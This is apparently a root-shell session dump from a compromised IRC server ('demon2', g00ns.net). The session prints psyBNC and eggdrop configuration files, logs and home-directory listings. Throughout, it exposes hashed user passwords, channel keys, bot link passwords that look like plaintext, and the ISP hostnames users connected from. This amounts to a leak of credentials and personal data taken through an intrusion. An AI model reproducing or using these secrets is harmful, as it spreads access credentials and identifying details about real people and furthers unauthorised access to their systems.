USER2.CHANNELS.KEY2=+1N2h262e2b2o2F2&2U3a2d2D2A USER2.CHANNELS.ENTRY1=#batcave USER2.CHANNELS.KEY1=+1I271$28262u2A2U2U USER2.CHANNELS.ENTRY0=#g00ns USER3.USER.LOGIN=giovanni USER3.USER.USER=katalyst USER3.USER.PASS=='E13`h0v0V`H1u0A'f USER3.USER.RIGHTS=0 USER3.USER.VLINK=0 USER3.USER.PPORT=0 USER3.USER.PARENT=0 USER3.USER.QUITTED=0 USER3.USER.DCCENABLED=1 USER3.USER.AUTOGETDCC=0 USER3.USER.AIDLE=0 USER3.USER.LEAVEQUIT=0 USER3.USER.AUTOREJOIN=1 USER3.USER.SYSMSG=1 USER3.USER.LASTLOG=0 USER3.USER.CERT=+ USER3.USER.VHOST=g00ns.net USER3.USER.NICK=giovanni USER3.SERVERS.SERVER1=S=irc.g00ns.net USER3.SERVERS.PORT1=6601 USER3.CHANNELS.ENTRY3=#seminar USER3.CHANNELS.ENTRY0=#g00ns USER3.CHANNELS.ENTRY1=#illmob USER3.CHANNELS.ENTRY4=#13337 USER1.LGI.ENTRY1=FiSh;#private USER1.LGI.ENTRY0=FiSh;#g00ns USER4.USER.LOGIN=sick USER4.USER.USER=sick USER4.USER.PASS=='t'L0Q'F'q'b16'o`a USER4.USER.RIGHTS=0 USER4.USER.VLINK=0 USER4.USER.PPORT=0 USER4.USER.PARENT=0 USER4.USER.QUITTED=0 USER4.USER.DCCENABLED=1 USER4.USER.AUTOGETDCC=0 USER4.USER.AIDLE=0 USER4.USER.LEAVEQUIT=0 USER4.USER.AUTOREJOIN=1 USER4.USER.SYSMSG=1 USER4.USER.LASTLOG=0 USER4.USER.CERT=+ USER4.USER.VHOST=g00ns.net USER4.USER.NICK=sick USER4.SERVERS.SERVER1=addserver s=irc.g00ns.net USER4.SERVERS.PORT2=6661 USER4.SERVERS.SERVER2=addserver irc.g00ns.net USER4.SERVERS.PORT3=6601 USER4.SERVERS.SERVER3=addserver addserver S=irc.g00ns.net USER4.SERVERS.PORT4=6601 USER4.SERVERS.SERVER4=addserver S=irc.g00ns.net USER4.SERVERS.PORT5=6601 USER4.SERVERS.SERVER5=s=irc.g00ns.net USER4.SERVERS.PORT6=6601 USER4.SERVERS.SERVER6=s=irc.g00ns.net USER4.SERVERS.PORT1=6601 [root@demon2 psybnc]# cat psybnc.conf PSYBNC.SYSTEM.PORT1=11473 PSYBNC.SYSTEM.HOST1= PSYBNC.HOSTALLOWS.ENTRY0=*;* USER1.USER.LOGIN=admin USER1.USER.USER=FiSh USER1.USER.PASS==1h1K'Z`U`B'810'='T USER1.USER.RIGHTS=1 USER1.USER.VLINK=0 USER1.USER.PPORT=0 USER1.USER.PARENT=0 USER1.USER.QUITTED=1 USER1.USER.DCCENABLED=1 USER1.USER.AUTOGETDCC=0 USER1.USER.AIDLE=0 USER1.USER.LEAVEQUIT=0 USER1.USER.AUTOREJOIN=1 USER1.USER.SYSMSG=1 USER1.USER.LASTLOG=0 USER1.USER.CERT=+ USER1.USER.VHOST= USER1.USER.NICK=_FiSh USER2.USER.LOGIN=FiSh USER2.USER.USER=FiSh USER2.USER.PASS==0v0'01'T'q0='l`O'f USER2.USER.RIGHTS=0 USER2.USER.VLINK=0 USER2.USER.PPORT=0 USER2.USER.PARENT=0 USER2.USER.QUITTED=0 USER2.USER.DCCENABLED=1 USER2.USER.AUTOGETDCC=0 USER2.USER.AIDLE=0 USER2.USER.LEAVEQUIT=0 USER2.USER.AUTOREJOIN=1 USER2.USER.SYSMSG=1 USER2.USER.LASTLOG=0 USER2.USER.CERT=+ USER2.USER.NICK=FiSh USER3.USER.LOGIN=pr0be USER3.USER.USER=pr0be USER3.USER.PASS==1G0$0u10`N`C0B`X'` USER3.USER.RIGHTS=0 USER3.USER.VLINK=0 USER3.USER.PPORT=0 USER3.USER.PARENT=0 USER3.USER.QUITTED=0 USER3.USER.DCCENABLED=1 USER3.USER.AUTOGETDCC=0 USER3.USER.AIDLE=0 USER3.USER.LEAVEQUIT=0 USER3.USER.AUTOREJOIN=1 USER3.USER.SYSMSG=1 USER3.USER.LASTLOG=0 USER3.USER.CERT=+ USER3.USER.VHOST=g00ns.net USER3.USER.AWAY=|a|f|k USER3.USER.NICK=pr0be USER3.SERVERS.SERVER1=irc.g00ns.net USER3.SERVERS.PORT2=6667 USER3.SERVERS.SERVER2=irc.g00ns.net USER3.SERVERS.PORT3=6601 USER3.SERVERS.SERVER3=S=irc.g00ns.net USER3.SERVERS.PORT1=6667 USER1.SERVERS.SERVER1=S=irc.g00ns.net USER1.SERVERS.PORT1=6601 USER1.CHANNELS.ENTRY1=#g00ns USER1.CHANNELS.ENTRY2=#13337 USER1.CHANNELS.ENTRY3=#40z USER1.CHANNELS.KEY3=+1H2i262j2c2s2R2Y USER1.CHANNELS.ENTRY4=#private USER1.CHANNELS.KEY4=+1H2i25202i2j2A2M2E3125 USER1.CHANNELS.ENTRY5=#seminar USER1.CHANNELS.ENTRY7=#help USER4.USER.LOGIN=SyNiCaL USER4.USER.USER=SyNiCaL USER4.USER.PASS==0G'11d`h1G121n0G`' USER4.USER.RIGHTS=0 USER4.USER.VLINK=0 USER4.USER.PPORT=0 USER4.USER.PARENT=0 USER4.USER.QUITTED=0 USER4.USER.DCCENABLED=1 USER4.USER.AUTOGETDCC=0 USER4.USER.AIDLE=0 USER4.USER.LEAVEQUIT=0 USER4.USER.AUTOREJOIN=1 USER4.USER.SYSMSG=1 USER4.USER.LASTLOG=0 USER4.USER.CERT=+ USER4.USER.VHOST=g00ns.net USER4.USER.NICK=SyNiCaL USER3.CHANNELS.ENTRY2=#40z USER3.CHANNELS.KEY2=+1H2i262j2c2s2R2Y USER3.CHANNELS.ENTRY5=#wboard USER3.CHANNELS.ENTRY7=#exploitercode USER3.CHANNELS.ENTRY3=#vBTEAM USER3.CHANNELS.ENTRY6=#BlackIRC USER3.CHANNELS.ENTRY8=#slavehack USER4.SERVERS.SERVER1=irc.g00ns.net USER4.SERVERS.PORT1=6667 USER4.CHANNELS.ENTRY3=#sizzurp USER4.CHANNELS.ENTRY4=#13337 [root@demon2 psybnc]# cat psybnc.gso.conf PSYBNC.SYSTEM.PORT1=11475 PSYBNC.SYSTEM.HOST1= PSYBNC.HOSTALLOWS.ENTRY0=*;* USER1.USER.LOGIN=admin USER1.USER.USER=Genocide USER1.USER.PASS==1h1K'Z`U`B'810'='T USER1.USER.RIGHTS=1 USER1.USER.VLINK=0 USER1.USER.PPORT=0 USER1.USER.PARENT=0 USER1.USER.QUITTED=0 USER1.USER.DCCENABLED=1 USER1.USER.AUTOGETDCC=0 USER1.USER.AIDLE=0 USER1.USER.LEAVEQUIT=0 USER1.USER.AUTOREJOIN=1 USER1.USER.SYSMSG=1 USER1.USER.LASTLOG=0 USER1.USER.CERT=+ USER1.USER.VHOST= USER1.USER.LEAVEMSG=afk USER1.USER.NICK=Genocide USER1.SERVERS.PORT2=6667 USER1.SERVERS.PORT1=7001 USER1.SERVERS.SERVER1=S=irc.evilcoders.net USER1.SERVERS.SERVER2=irc.g00ns.net USER2.USER.LOGIN=sCuZz USER2.USER.USER=sCuZz USER2.USER.PASS=='q0N1q070I`I`O'W'y USER2.USER.RIGHTS=0 USER2.USER.VLINK=0 USER2.USER.PPORT=0 USER2.USER.PARENT=0 USER2.USER.QUITTED=0 USER2.USER.DCCENABLED=1 USER2.USER.AUTOGETDCC=0 USER2.USER.AIDLE=0 USER2.USER.LEAVEQUIT=0 USER2.USER.AUTOREJOIN=1 USER2.USER.SYSMSG=1 USER2.USER.LASTLOG=0 USER2.USER.CERT=+ USER2.USER.VHOST=g00ns.net USER2.USER.NICK=sCuZz USER1.CHANNELS.ENTRY1=#s3x USER1.CHANNELS.KEY1=+1W202824 USER1.CHANNELS.ENTRY3=#batcave USER1.CHANNELS.KEY3=+1I271$28262u2A2U2U USER1.CHANNELS.ENTRY7=#exopers USER1.CHANNELS.ENTRY4=#notgay USER1.CHANNELS.ENTRY9=#illmob USER1.CHANNELS.KEY9=+1e2a1X2f2f2l1P2y2R USER1.CHANNELS.ENTRY11=#t3st USER1.CHANNELS.ENTRY10=#hightechhost USER1.CHANNELS.ENTRY6=#420 USER1.CHANNELS.ENTRY2=#spk USER1.CHANNELS.ENTRY0=#g00ns USER2.SERVERS.SERVER1=irc.partyvan.fm USER2.SERVERS.PORT1=6667 USER2.CHANNELS.ENTRY1=#420 USER2.CHANNELS.ENTRY2=#private USER2.CHANNELS.KEY2=+1S282026242B2U2Q2F362@3B USER2.CHANNELS.ENTRY3=#batcave USER2.CHANNELS.ENTRY0=#g00ns [root@demon2 psybnc]# cd log [root@demon2 log]# ls INFO USER1.LOG.old USER2.LOG.old USER3.TRL USER4.TRL psybnc.log USER1.TRL USER2.TRL USER4.LOG USER5.TRL psybnc.log.old USER2.LOG USER3.LOG.old USER4.LOG.old USER6.TRL [root@demon2 log]# cat psybnc.log Sat Apr 19 15:06:18 :Listener created : port 11475 Sat Apr 19 15:06:18 :psyBNC2.3.2-7-cBtITLdDMSNpE started (PID :14297) Sat Apr 19 15:06:18 :SSL initialized Sat Apr 19 15:06:18 :Loading all Users.. Sat Apr 19 15:06:23 :connect from Sat Apr 19 15:06:23 :User admin () trying irc.evilcoders.net port 7001 ( Sat Apr 19 15:06:23 :User admin () connected to S=irc.evilcoders.net:7001 ( Sat Apr 19 15:06:23 :User admin got disconnected from server. Sat Apr 19 15:06:31 :User admin logged in. Sat Apr 19 15:06:38 :User sCuZz () trying irc.partyvan.fm port 6667 (g00ns.net). Sat Apr 19 15:06:38 :User sCuZz () connected to irc.partyvan.fm:6667 (g00ns.net) Sat Apr 19 15:06:53 :User admin () trying irc.g00ns.net port 6667 ( Sat Apr 19 15:06:53 :User admin () connected to irc.g00ns.net:6667 ( Sat Apr 19 15:43:14 :connect from pool-71-105-242-232.lsanca.dsl-w.verizon.net Sat Apr 19 15:43:14 :User sCuZz logged in. Sat Apr 19 18:09:32 :User sCuZz disconnected (from Sat Apr 19 20:31:32 :connect from pool-71-105-242-232.lsanca.dsl-w.verizon.net Sat Apr 19 20:31:32 :User sCuZz logged in. Sat Apr 19 20:47:24 :User sCuZz disconnected (from Sun Apr 20 00:20:44 :User admin quitted (from Sun Apr 20 08:58:52 :connect from prometheus.aakretech.no Sun Apr 20 08:59:25 :User admin logged in. Sun Apr 20 11:27:16 :connect from pool-71-105-242-232.lsanca.dsl-w.verizon.net Sun Apr 20 11:27:16 :User sCuZz logged in. Sun Apr 20 11:57:48 :User sCuZz disconnected (from Sun Apr 20 19:12:31 :User admin disconnected (from Sun Apr 20 21:42:46 :connect from pool-71-105-242-232.lsanca.dsl-w.verizon.net Sun Apr 20 21:42:46 :User sCuZz logged in. Sun Apr 20 23:21:59 :connect from pool-71-105-242-232.lsanca.dsl-w.verizon.net Sun Apr 20 23:21:59 :User sCuZz logged in. Sun Apr 20 23:24:04 :User sCuZz (sCuZz) disconnecting from stoned server. Sun Apr 20 23:24:04 :User sCuZz got disconnected from server. Sun Apr 20 23:24:15 :User sCuZz () trying p.60z.org port 6667 (g00ns.net). Sun Apr 20 23:24:15 :User sCuZz () connected to p.60z.org:6667 (g00ns.net) Sun Apr 20 23:24:29 :User sCuZz quitted (from Sun Apr 20 23:24:30 :connect from pool-71-105-242-232.lsanca.dsl-w.verizon.net Sun Apr 20 23:24:30 :User sCuZz logged in. Sun Apr 20 23:25:11 :Hop requested by sCuZz. Quitting. Sun Apr 20 23:25:11 :User sCuZz got disconnected from server. Sun Apr 20 23:25:15 :User sCuZz () trying irc.partyvan.fm port 6667 (g00ns.net). Sun Apr 20 23:25:15 :User sCuZz () connected to irc.partyvan.fm:6667 (g00ns.net) Sun Apr 20 23:25:20 :User sCuZz quitted (from Sun Apr 20 23:25:21 :connect from pool-71-105-242-232.lsanca.dsl-w.verizon.net Sun Apr 20 23:25:21 :User sCuZz logged in. Sun Apr 20 23:33:04 :User sCuZz quitted (from Sun Apr 20 23:41:01 :User sCuZz disconnected (from Mon Apr 21 10:40:13 :connect from prometheus.aakretech.no Mon Apr 21 10:40:35 :User admin logged in. [root@demon2 log]# cd ../.. [root@demon2 bnc]# cd psybnc/probe/ [root@demon2 probe]# ls -al total 324 drwxrwxr-x 3 bnc bnc 4096 Sep 23 2007 . drwxr-xr-x 12 bnc bnc 4096 Apr 20 23:41 .. drwxr-xr-x 11 bnc bnc 4096 Nov 15 18:37 psybnc -rw-rw-r-- 1 bnc bnc 312177 Aug 19 2005 psyBNC-2.3.2-7.tar.gz [root@demon2 probe]# cd psybnc [root@demon2 psybnc]# ls CHANGES help Makefile motd psybnc.conf.old SCRIPTING TODO config.h key makefile.out psybnc psybnc.pid scripts tools COPYING lang makesalt psybncchk README src FAQ log menuconf psybnc.conf salt.h targets.mak [root@demon2 psybnc]# cat psybnc.conf PSYBNC.SYSTEM.PORT1=31337 PSYBNC.SYSTEM.ME=probe PSYBNC.SYSTEM.HOST1=* PSYBNC.HOSTALLOWS.ENTRY0=*;* USER1.USER.NICK=pr0be`bnc USER1.USER.USER=pr0be USER1.USER.PASS==0a'6`c0x1C0P'n`N0@`p1I0M1a0F1916 USER1.USER.VHOST=g00ns.net USER1.USER.RIGHTS=1 USER1.USER.VLINK=0 USER1.USER.AWAY=afk USER1.USER.AWAYNICK=pr0be`bnc USER1.USER.LOGIN=pr0be USER1.SERVERS.SERVER1=irc.g00ns.net USER1.SERVERS.PORT1=6667 USER1.CHANNELS.ENTRY1=#private USER1.CHANNELS.KEY1=+1L1S2'2o2j2m2i2V353a2k2e2s USER1.CHANNELS.ENTRY3=#exploitercode USER1.CHANNELS.ENTRY5=#13337 USER1.CHANNELS.ENTRY6=#seminar USER1.CHANNELS.ENTRY7=#BlackIRC USER1.CHANNELS.ENTRY8=#Help USER1.CHANNELS.ENTRY9=#batcave USER1.CHANNELS.KEY9=+1G1I1T2i2e2s2d2M35 USER1.CHANNELS.ENTRY10=#20z USER1.CHANNELS.ENTRY11=#HACK-RADIO USER1.CHANNELS.ENTRY12=#officiallyretarded USER1.CHANNELS.ENTRY13=#qrash USER1.CHANNELS.ENTRY14=#seminar-private USER1.CHANNELS.ENTRY15=#g00ns-radio USER1.CHANNELS.ENTRY4=#illmob USER1.CHANNELS.ENTRY2=#g00ns USER1.CHANNELS.ENTRY16=#irclogs USER1.CHANNELS.ENTRY0=#exopers USER2.USER.LOGIN=probe USER2.USER.USER=probe USER2.USER.PASS==1L'S`v`50A1l'b0y17 USER2.USER.RIGHTS=0 USER2.USER.VLINK=0 USER2.USER.PPORT=0 USER2.USER.PARENT=0 USER2.USER.QUITTED=0 USER2.USER.DCCENABLED=1 USER2.USER.AUTOGETDCC=0 USER2.USER.AIDLE=0 USER2.USER.LEAVEQUIT=0 USER2.USER.AUTOREJOIN=1 USER2.USER.SYSMSG=1 USER2.USER.LASTLOG=0 USER2.USER.CERT=+ USER2.USER.NICK=probe [root@demon2 psybnc]# cd log [root@demon2 log]# ls INFO psybnc.log USER1.LOG USER1.TRL USER2.TRL [root@demon2 log]# head psybnc.log Sun Sep 23 21:11:08 :Listener created : port 31337 Sun Sep 23 21:11:08 :Can't create listening sock on host * port 31337 (bind) Sun Sep 23 21:11:08 :SSL initialized Sun Sep 23 21:11:08 :Loading all Users.. Sun Sep 23 21:11:08 :psyBNC2.3.2-7-cBtITLdDMSNpE started (PID :9672) Sun Sep 23 21:11:13 :User pr0be () has no server added Sun Sep 23 21:12:43 :User pr0be () has no server added Sun Sep 23 21:14:13 :User pr0be () has no server added Sun Sep 23 21:14:15 :connect from fl-71-3-132-100.dhcp.embarqhsd.net Sun Sep 23 21:14:18 :User pr0be logged in. [root@demon2 log]# cd /home [root@demon2 home]# cd egg [root@demon2 egg]# ls -al total 1076 drwx--x--x 10 egg egg 4096 Mar 23 11:26 . drwx--x--x 50 root root 4096 Mar 27 16:19 .. -rw------- 1 egg egg 6532 Apr 14 23:11 .bash_history -rw-r--r-- 1 egg egg 24 Aug 9 2007 .bash_logout -rw-r--r-- 1 egg egg 176 Aug 9 2007 .bash_profile -rw-r--r-- 1 egg egg 124 Aug 9 2007 .bashrc drwx--x--x 3 egg egg 4096 Aug 9 2007 domains drwxrwxr-x 3 egg egg 4096 Apr 14 23:10 efnet drwx------ 11 egg egg 4096 Apr 21 14:00 eggdrop drwxr-xr-x 10 egg egg 4096 Aug 13 2007 eggdrop1.6.18 -rw-rw-r-- 1 egg egg 1025608 Aug 13 2007 eggdrop1.6.18.tar.gz drwx------ 2 egg egg 4096 Aug 21 2007 .elinks drwxrwx--- 3 egg mail 4096 Aug 9 2007 imap drwx------ 2 egg egg 4096 Aug 9 2007 mail lrwxrwxrwx 1 egg egg 35 Aug 9 2007 public_html -> ./domains/egg.g00ns.net/public_html -rw-r----- 1 egg mail 34 Aug 9 2007 .shadow drwx------ 2 egg egg 4096 Aug 12 2007 .ssh [root@demon2 egg]# ls -al efnet/ total 1508 drwxrwxr-x 3 egg egg 4096 Apr 14 23:10 . drwx--x--x 10 egg egg 4096 Mar 23 11:26 .. drwx------ 2 egg egg 4096 Mar 23 11:30 ... -rwx------ 1 egg egg 1497940 Mar 23 12:35 fight -rw-r--r-- 1 egg egg 6 Apr 14 23:10 .pid.bloo -rw-r--r-- 1 egg egg 6 Apr 14 23:10 .pid.etho -rw-r--r-- 1 egg egg 6 Apr 14 23:10 .pid.hacker -rw-r--r-- 1 egg egg 6 Apr 14 23:10 .pid.hthbot -rw-r--r-- 1 egg egg 5 Mar 23 11:51 .pid.hthbot. -rw-r--r-- 1 egg egg 6 Apr 14 23:10 .pid.logic -rw-r--r-- 1 egg egg 6 Apr 14 23:10 .pid.notgay [root@demon2 egg]# ls -al eggdrop total 1260 drwx------ 11 egg egg 4096 Apr 21 14:00 . drwx--x--x 10 egg egg 4096 Mar 23 11:26 .. -rwxrw-r-- 1 egg egg 2277 Mar 23 00:31 boneless.botchk -rw------- 1 egg egg 1264 Apr 21 14:00 boneless.chan -rw------- 1 egg egg 1264 Apr 21 00:00 boneless.chan~bak -rw-r--r-- 1 egg egg 52983 Mar 23 11:36 boneless.conf -rw------- 1 egg egg 1183 Apr 21 14:00 boneless.user -rw------- 1 egg egg 1183 Apr 21 00:00 boneless.user~bak drwxrwxr-x 5 egg egg 4096 Aug 13 2007 doc lrwxrwxrwx 1 egg egg 14 Aug 13 2007 eggdrop -> eggdrop-1.6.18 -rwxr-xr-x 1 egg egg 888159 Aug 13 2007 eggdrop-1.6.18 drwxrwxr-x 3 egg egg 4096 Aug 13 2007 filesys drwxrwxr-x 4 egg egg 4096 Aug 13 2007 help -rwxrw-r-- 1 egg egg 2272 Mar 23 00:31 keebler.botchk -rw------- 1 egg egg 1263 Apr 21 14:00 keebler.chan -rw------- 1 egg egg 1263 Apr 21 00:00 keebler.chan~bak -rw-r--r-- 1 egg egg 52956 Mar 23 11:32 keebler.conf -rw------- 1 egg egg 1305 Apr 21 14:00 keebler.user -rw------- 1 egg egg 1305 Apr 21 00:00 keebler.user~bak drwxrwxr-x 2 egg egg 4096 Aug 13 2007 language drwxrwxr-x 2 egg egg 4096 Apr 21 03:05 logs lrwxrwxrwx 1 egg egg 14 Aug 13 2007 modules -> modules-1.6.18 drwxrwxr-x 2 egg egg 4096 Aug 13 2007 modules-1.6.18 drwx------ 3 egg egg 4096 Aug 19 2007 netbots -rw-r--r-- 1 egg egg 6 Apr 14 23:10 pid.boneless -rw-r--r-- 1 egg egg 6 Apr 14 23:10 pid.keebler -rw-r--r-- 1 egg egg 6 Apr 14 23:10 pid.sentry -rw-rw-r-- 1 egg egg 6 Apr 14 23:09 pid.V0LTR0N -rw-r--r-- 1 egg egg 25077 Aug 13 2007 README drwxrwxr-x 2 egg egg 4096 Mar 23 00:31 scripts -rwxrw-r-- 1 egg egg 2267 Mar 23 00:31 sentry.botchk -rw------- 1 egg egg 1257 Apr 21 13:59 sentry.chan -rw------- 1 egg egg 1257 Apr 21 00:00 sentry.chan~bak -rw-r--r-- 1 egg egg 52950 Mar 23 00:03 sentry.conf -rw------- 1 egg egg 1327 Apr 21 13:59 sentry.user -rw------- 1 egg egg 1327 Apr 21 00:00 sentry.user~bak drwxrwxr-x 2 egg egg 4096 Aug 13 2007 text -rw------- 1 egg egg 1415 Apr 21 14:00 v0ltr0n.chan -rw------- 1 egg egg 1415 Apr 21 00:00 v0ltr0n.chan~bak -rw-r--r-- 1 egg egg 52890 Apr 14 23:09 v0ltr0n.conf -rw------- 1 egg egg 0 Apr 21 14:00 v0ltr0n.notes -rw------- 1 egg egg 1273 Apr 21 14:00 v0ltr0n.user -rw------- 1 egg egg 1273 Apr 21 00:00 v0ltr0n.user~bak [root@demon2 egg]# grep -v "^#" eggdrop/v0ltr0n.conf | grep -v ^$ set username "v0ltr0n" set admin "Altaaf " set network "60z.org" set timezone "EST" set offset "5" set my-hostname "g00ns.net" set my-ip "" set max-logs 5 set max-logsize 0 set quick-logs 0 set raw-log 0 logfile mco * "logs/eggdrop.log" logfile jpk #lamest "logs/lamest.log" set log-time 1 set keep-all-logs 0 set logfile-suffix ".%d%b%Y" set switch-logfiles-at 300 set quiet-save 1 set console "mkcobxs" set userfile "v0ltr0n.user" set sort-users 0 set help-path "help/" set text-path "text/" set temp-path "/tmp" set motd "text/motd" set telnet-banner "text/banner" set userfile-perm 0600 set botnet-nick "V0LTR0N" listen 11800 bots listen 11801 users set remote-boots 2 set share-unlinks 1 set protect-telnet 0 set dcc-sanitycheck 0 set ident-timeout 5 set require-p 0 set open-telnets 0 set stealth-telnets 0 set use-telnet-banner 0 set connect-timeout 15 set dcc-flood-thr 3 set telnet-flood 5:60 set paranoid-telnet-flood 1 set resolve-timeout 15 set reserved-portrange 11820:11830 set ignore-time 15 set hourly-updates 00 set owner "Altaaf" set notify-newusers "$owner" set default-flags "hp" set whois-fields "url birthday" set die-on-sighup 0 set die-on-sigterm 1 unbind dcc n tcl *dcc:tcl unbind dcc n set *dcc:set set must-be-owner 1 unbind dcc n simul *dcc:simul set max-dcc 50 set allow-dk-cmds 1 set dupwait-timeout 5 set mod-path "modules/" loadmodule dns loadmodule channels set chanfile "v0ltr0n.chan" set force-expire 0 set share-greet 0 set use-info 1 set global-flood-chan 10:60 set global-flood-deop 3:10 set global-flood-kick 3:10 set global-flood-join 5:60 set global-flood-ctcp 3:60 set global-flood-nick 5:60 set global-aop-delay 5:30 set global-idle-kick 0 set global-chanmode "nt" set global-stopnethack-mode 0 set global-revenge-mode 0 set global-ban-time 120 set global-exempt-time 60 set global-invite-time 60 set global-chanset { -autoop +autovoice -bitch +cycle +dontkickops +dynamicbans +dynamicexempts +dynamicinvites -enforcebans +greet -inactive -nodesynch -protectfriends +protectops -revenge -revengebot -secret -seen +shared +statuslog +userbans +userexempts +userinvites -protecthalfops -autohalfop } loadmodule server set net-type 5 set nick "v0ltr0n" set altnick "v0ltr0n?" set realname "v0ltr0n" bind evnt - init-server evnt:init_server proc evnt:init_server {type} { global botnick putquick "MODE $botnick +i-wsx" } set default-port 6667 set servers { p.60z.org:6667 } set keep-nick 1 set strict-host 0 set quiet-reject 1 set lowercase-ctcp 0 set answer-ctcp 3 set flood-msg 5:60 set flood-ctcp 3:60 set never-give-up 1 set server-cycle-wait 60 set server-timeout 60 set servlimit 0 set check-stoned 1 set serverror-quit 1 set max-queue-msg 300 set trigger-on-ignore 0 set exclusive-binds 0 set double-mode 1 set double-server 1 set double-help 1 set optimize-kicks 1 set stack-limit 4 loadmodule ctcp set ctcp-mode 0 loadmodule irc set bounce-bans 1 set bounce-exempts 0 set bounce-invites 0 set bounce-modes 0 set max-bans 100 set max-exempts 20 set max-invites 20 set max-modes 100 set kick-fun 0 set ban-fun 0 set learn-users 0 set wait-split 600 set wait-info 180 set mode-buf-length 200 unbind msg - ident *msg:ident unbind msg - addhost *msg:addhost set opchars "@" set no-chanrec-info 0 set prevent-mixing 1 loadmodule transfer set max-dloads 3 set dcc-block 0 set copy-to-tmp 1 set xfer-timeout 30 loadmodule share loadmodule compress set share-compressed 1 loadmodule filesys set files-path "/home/protect/eggdrop/filesys" set incoming-path "/home/protect/eggdrop/filesys/incoming" set upload-to-pwd 0 set filedb-path "" set max-file-users 20 set max-filesize 1024 loadmodule notes set notefile "v0ltr0n.notes" set max-notes 50 set note-life 60 set allow-fwd 0 set notify-users 1 set notify-onjoin 1 loadmodule console set console-autosave 1 set force-channel 0 set info-party 0 loadmodule seen loadmodule blowfish loadmodule uptime source scripts/alltools.tcl source scripts/action.fix.tcl source netbots/netbots.tcl source scripts/http.tcl source scripts/fsck.tcl source scripts/news.tcl source scripts/google.tcl source scripts/pcheck.tcl source scripts/dns.tcl source scripts/movies.tcl source scripts/userinfo.tcl loadhelp userinfo.help [root@demon2 egg]# cat eggdrop/v0ltr0n.user #4v: eggdrop v1.6.18 -- V0LTR0N -- written Mon Apr 21 14:00:00 2008 boneless - bfloN --BOTADDR ts.g00ns.net:11800/11801 --BOTFL ghp --HOSTS *!boneless@ts.g00ns.net --LASTON 1198721898 #g00ns --XTRA created 1187476753 --PASS 8bky9t3q4ey6t sentry - bfloN --HOSTS *!sentry@ --LASTON 1198721877 unlinked --XTRA created 1187476804 --BOTADDR --PASS f2w7bi713nyoxl keebler - bfloN --HOSTS *!keebler@ --LASTON 1198721898 unlinked --XTRA created 1187476804 --BOTADDR --PASS i347t6epn2 v0ltr0n - bfloN --HOSTS *!v0ltr0n@ --LASTON 1208758936 #priv --XTRA created 1187476804 --BOTADDR --PASS gcc8k5hi44w1 Altaaf - hjlmnoptx --HOSTS *!blackirc@blackirc.info --HOSTS -telnet!*@* --LASTON 1190453133 @boneless --PASS +GviW90Qn.aQ0 --XTRA created 1187300220 c0ma - hjlmnoptx --HOSTS *!*@n00b-pwner.com --LASTON 1187920073 @boneless --PASS +3EuN1.om33a. --XTRA created 1187570739 ::#BlackIRC bans ::#priv bans *exempt - - % *!*@g00ns.net:+0:+1187835633:1190601012:c0ma:requested &&#BlackIRC exempts &&#priv exempts $$#BlackIRC invites $$#priv invites [root@demon2 egg]# ls -al eggdrop/v0ltr0n.notes -rw------- 1 egg egg 0 Apr 21 14:00 eggdrop/v0ltr0n.notes [root@demon2 egg]# cd eggdrop/logs/ [root@demon2 logs]# ls -al total 84 drwxrwxr-x 2 egg egg 4096 Apr 21 03:05 . drwx------ 11 egg egg 4096 Apr 21 14:00 .. -rw-r--r-- 1 egg egg 411 Aug 13 2007 CONTENTS -rw-rw-r-- 1 egg egg 68581 Apr 21 14:15 eggdrop.log [root@demon2 logs]# head eggdrop.log [03:05] @#BlackIRC (+stn) : [m/1 o/1 h/0 v/0 n/0 b/0 e/0 I/0] [03:05] @#priv (+tn) : [m/1 o/1 h/0 v/0 n/0 b/0 e/0 I/0] [03:05] #HighTechHost (+trna) : [m/4 o/3 h/0 v/0 n/1 b/0 e/0 I/0] [03:05] #g00ns (+trna) : [m/52 o/8 h/3 v/6 n/35 b/12 e/0 I/0] [03:05] #HighTechHost (+tn) : [m/26 o/24 h/0 v/0 n/2 b/0 e/0 I/0] [03:05] @#/bin/laden (+tn) : [m/2 o/2 h/0 v/0 n/0 b/0 e/0 I/0] [03:05] #HighTechHost (+tn) : [m/26 o/24 h/0 v/0 n/2 b/0 e/0 I/0] [03:05] @#/bin/laden (+tn) : [m/2 o/2 h/0 v/0 n/0 b/0 e/0 I/0] [03:10] #HighTechHost (+trna) : [m/4 o/3 h/0 v/0 n/1 b/0 e/0 I/0] [03:10] #g00ns (+trna) : [m/52 o/8 h/3 v/6 n/35 b/12 e/0 I/0] [root@demon2 logs]# tail eggdrop.log [14:10] #HighTechHost (+tn) : [m/26 o/23 h/0 v/0 n/3 b/0 e/0 I/0] [14:10] @#/bin/laden (+tn) : [m/2 o/2 h/0 v/0 n/0 b/0 e/0 I/0] [14:15] #HighTechHost (+tn) : [m/26 o/23 h/0 v/0 n/3 b/0 e/0 I/0] [14:15] @#/bin/laden (+tn) : [m/2 o/2 h/0 v/0 n/0 b/0 e/0 I/0] [14:15] @#BlackIRC (+stn) : [m/1 o/1 h/0 v/0 n/0 b/0 e/0 I/0] [14:15] @#priv (+tn) : [m/2 o/1 h/0 v/0 n/1 b/0 e/0 I/0] [14:15] #HighTechHost (+tn) : [m/26 o/23 h/0 v/0 n/3 b/0 e/0 I/0] [14:15] @#/bin/laden (+tn) : [m/2 o/2 h/0 v/0 n/0 b/0 e/0 I/0] [14:15] #HighTechHost (+trna) : [m/4 o/3 h/0 v/0 n/1 b/0 e/0 I/0] [14:15] #g00ns (+trna) : [m/57 o/10 h/3 v/10 n/34 b/12 e/0 I/0] [root@demon2 logs]# cd .. [root@demon2 eggdrop]# cd /home [root@demon2 home]# cd evilcode [root@demon2 evilcode]# ls -al total 148 drwxr-xr-x 9 evilcode evilcode 4096 Mar 25 13:40 . drwx--x--x 50 root root 4096 Mar 27 16:19 .. drwx------ 2 evilcode evilcode 4096 Aug 1 2007 backups -rw------- 1 evilcode evilcode 6456 Apr 19 11:25 .bash_history -rw-r--r-- 1 evilcode evilcode 304 Apr 29 2006 .bash_logout -rw-r--r-- 1 evilcode evilcode 191 Apr 29 2006 .bash_profile -rw-r--r-- 1 evilcode evilcode 124 Apr 29 2006 .bashrc drwx--x--x 3 evilcode evilcode 4096 Apr 29 2006 domains -rw-r--r-- 1 evilcode evilcode 383 Apr 29 2006 .emacs drwxrwx--- 3 evilcode evilcode 4096 Aug 1 2007 imap drwxrwxr-x 2 evilcode evilcode 4096 Aug 8 2007 index0r_img -rw-rw-r-- 1 evilcode evilcode 22825 Feb 24 2007 index.php -rw-rw-r-- 1 evilcode evilcode 51019 Feb 24 2007 i.zip drwx------ 2 evilcode evilcode 4096 Aug 1 2007 mail 